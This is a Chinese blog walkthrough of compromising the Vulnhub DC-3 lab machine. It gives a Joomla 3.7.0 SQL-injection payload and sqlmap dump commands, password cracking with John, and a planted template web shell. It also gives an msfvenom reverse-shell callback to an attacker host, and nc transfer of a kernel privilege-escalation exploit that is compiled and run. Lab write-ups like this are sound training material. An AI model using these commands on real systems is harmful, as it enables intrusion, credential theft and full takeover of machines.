vulnhub 入门DC-3

本文介绍了通过Vulnhub的DC-3靶机进行安全渗透测试的过程。首先,利用80端口的SQL注入漏洞(针对Joomla 3.7.0),获取管理员密码并使用John进行爆破。接着,通过目录扫描找到管理后台,使用Metasploit框架进行攻击。在获取部分权限后,通过内核版本查找并利用提权exploit,借助nc命令传输文件。虽然初次尝试未成功,但最终找到了适合内核版本的exp并成功提权。此外,文章还提及了使用joomscan工具进行扫描,以及如何利用MSFVenom创建反弹shell。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

首先设置成下面的样子再运行

在这里插入图片描述

开放80端口,去访问一下。搜索对应CMS漏洞,存在sql注入漏洞,Joomla 3.7.0 SQL注入漏洞。payload

/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,user()),1)

在这里插入图片描述

sqlmap -u "http://192.168.254.131/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,user()),1)" --dbs		//爆数据库
sqlmap -u "http://192.168.254.131/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,user()),1)" -D joomladb --tables		//爆表名
sqlmap -u "http://192.168.254.131/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,user()),1)" -D joomladb -T '#__users' --columns		//爆列名
sqlmap -u "http://192.168.254.131/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,user()),1)" -D joomladb -T '#__users' -C 'username' --dump		//爆用户名
sqlmap -u "http://192.168.254.131/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,user()),1)" -D joomladb -T '#__users' -C 'password' --dump		//爆密码

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

得到的密码写入1.txt,使用john爆破

$2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu
echo '$2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu' > 1.txt
john 1.txt

在这里插入图片描述

得到密码snoopy。目录扫描到管理后台,administrator。登录

在这里插入图片描述

msf攻击,需要登录到后台后才可以利用

在这里插入图片描述

在这里插入图片描述

python -c 'import pty; pty.spawn("/bin/bash")'		得到交互shell
uname -r

查看内核版本,searchsploit搜索,进行提权

在这里插入图片描述

刚好有nc命令,反向传输文件

在这里插入图片描述

成功,接下来编译执行,发现失败,继续传44300.c,编译运行,同样发现不行

uname -a		找版本
searchsploit Ubuntu 16.04

继续根据版本号来找exp,尝试这个

在这里插入图片描述

在这里插入图片描述

有希望,到github下载发现404,但是在下面这找到

https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/blob/main/bin-sploits/39772.zip

nc传输

nc -nv <kali_ip> 1234 > 39772.c		目标机执行
nc -lp 1234 < 39772.c		kali执行

在这里插入图片描述

unzip 39772.zip -d ./		解压.zip文件
cd 39772
tar -xvf exploit.tar		解压.tar文件
cd ebpf_mapfd_doubleput_exploit
./compile.sh
./doubleput

运行完后等待一会,提权成功

在这里插入图片描述

涉及到的其他方法

使用工具joomscan扫描版本、目录等,获取一些信息

joomscan --url <url>

在这里插入图片描述

searchsoloit joomla 3.7.0

可以查看有哪些漏洞,发现有两个漏洞符合当前版本

在这里插入图片描述

cat /usr/share/exploitdb/exploits/php/webapps/42033.txt,文件给出漏洞信息以及利用方法

在这里插入图片描述

拿shell的时候可以从后台管理入手,在模板中修改index.php文件,添加一句话

在这里插入图片描述

在这里插入图片描述

至于路径,可以用dirb或dirsearch扫描到

在这里插入图片描述

连接成功,之后就可以很方便在蚁剑上传文件到服务器

在这里插入图片描述

利用msfvenom建立反弹shell

msfvenom -p php/meterpreter/reverse_tcp LHOST=<kali_ip> LPORT=4444 > msfshell.php

在这里插入图片描述

拖到本机桌面后再拖到/var/www/html/目录

在这里插入图片描述

之后进入msfconsole,输入下列命令

use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost <kali_ip>
set lport 4444
run

浏览器访问

在这里插入图片描述

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值